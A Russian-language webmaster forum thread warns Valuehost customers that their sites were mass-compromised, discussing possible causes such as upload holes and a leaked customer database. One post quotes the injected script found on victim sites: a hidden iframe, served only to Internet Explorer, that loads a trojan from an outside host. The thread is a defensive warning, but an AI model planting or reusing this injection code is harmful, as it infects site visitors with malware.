Важно! Владельцам сайтов на Валюе

_
На сайте с 24.07.2002
Offline
299
_Ad
#11

Удивительно, что вы не знаете.. вообще тема довольно старая.

Вот краткое описание событий: http://dp.ru/spb/news/incident/2006/10/20/106165/

AH
На сайте с 18.03.2006
Offline
204
#12
WebCode:
А кто-нибудь знает, каким образом это происходит? Что взламывают?

Через дыры в скриптах все это делается, например через галереи с upload картинками на сервер, заливают всякую бяку и потом меняют код.

Цены на регистрацию доменов ( https://1reg.online/domains.price ).
_
На сайте с 24.07.2002
Offline
299
_Ad
#13
Art-Host:
Через дыры в скриптах все это делается, например через галереи с upload картинками на сервер, заливают всякую бяку и потом меняют код.

все гораздо проще. почитайте мою ссылку ;)

AH
На сайте с 18.03.2006
Offline
204
#14
_Ad:
все гораздо проще. почитайте мою ссылку ;)

Врядли имея доступ к FTP нарушитель будет только видоизменять индексный файл всякими iframe и прочей ерундой, которая вставляется для засылки трояна пользователям компьютеров, которые откроют данный сайт, хотя бог его знает этих уродов сети, которым больше заниматься нечем, как ломать сайты через дыры.

[Удален]
#15

И что вы на нем сидите? Идите на мастерхост и экономьте свои нервы! :)

_
На сайте с 24.07.2002
Offline
299
_Ad
#16

ну покупателей базы наверно не мало было. кто то троянчика засадил, а кто-то так не умеет и поэтому тупо блок ссылок поставил.. В конце концов, это тоже работает, ибо многие сайты могут месяцами висеть без всякого интереса со стороны своих хозяев...

The WishMaster
На сайте с 29.09.2005
Offline
2542
#17
Art-Host:
Через дыры в скриптах все это делается,

И почему-то только на валуйхосте...:) Вряд ли скрипт виноват.

Пешу текста дешыго! Тематики - туризм, СЕО, творчество, кулинария, шизотерика :)
olezha
На сайте с 25.07.2005
Offline
113
#18

Такого массового вскрытия Валухостовских серверов, я еще не видел, люди у кого хостинг Valuehost, срочно смените пароли и проверьте index файлы своих сайтов!

Сейчас прошелся по самым разным сайтам Valuehost большинство нашпигованы кодом для IE вроде этого:

<script type="text/javascript">if (navigator.userAgent.indexOf('MSIE') != -1) { document.writeln('<iframe src="http://critical-success-online.com/1.php?c=' + escape(document.location) + '" frameborder=0 border=0 width=0 height=0 style="display: none"></iframe>'); }</script><script type="text/javascript">if (navigator.userAgent.indexOf('MSIE') != -1) { document.writeln('<iframe src="http://critical-success-online.com/1.php?c=' + escape(document.location) + '" frameborder=0 border=0 width=0 height=0 style="display: none"></iframe>'); }</script>

Что больше всего поражает в историях вскрытия Валухостовских виртуальных серверов, так это позиция самой компании, т.е. не признание собственных проблем, и не информирование своих клиентов об этом, но ведь всем ясно, что на тысячах сайтов в одно мгновение не могут появиться коды погружающие Трояны, и в этом нет вины клиента, хотя суппорт Valuehost всегда утверждает обратное...

Поэтому единственный возможный способ предупредить владельцев вскрытых ресурсов только через форумы.

Мгновенные кредиты в WMZ и WMR под выгодные проценты (https://superlend.ru/zaim/index.php)
AH
На сайте с 18.03.2006
Offline
204
#19
The WishMaster:
И почему-то только на валуйхосте...:) Вряд ли скрипт виноват.

Кстати, может быть и value во всем виноват, сегодня в whois домены искал, домен allhost.ru занят, проверил в браузере, открылась чистая страница и в ней ифреймы с троянами, осторожно, у кого нет антивируса, домен в браузере не набирать, иначе посадят вам трояна не дай бог.

Brutus
На сайте с 06.10.2005
Offline
273
#20

хмм...вообще прикольно :) то-то мне с неделю-полторы назад приходило предложение купить базу Валуя свежую :)))

А вообще бежать с такого хостинга нужно, причем в срочном порядке...

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий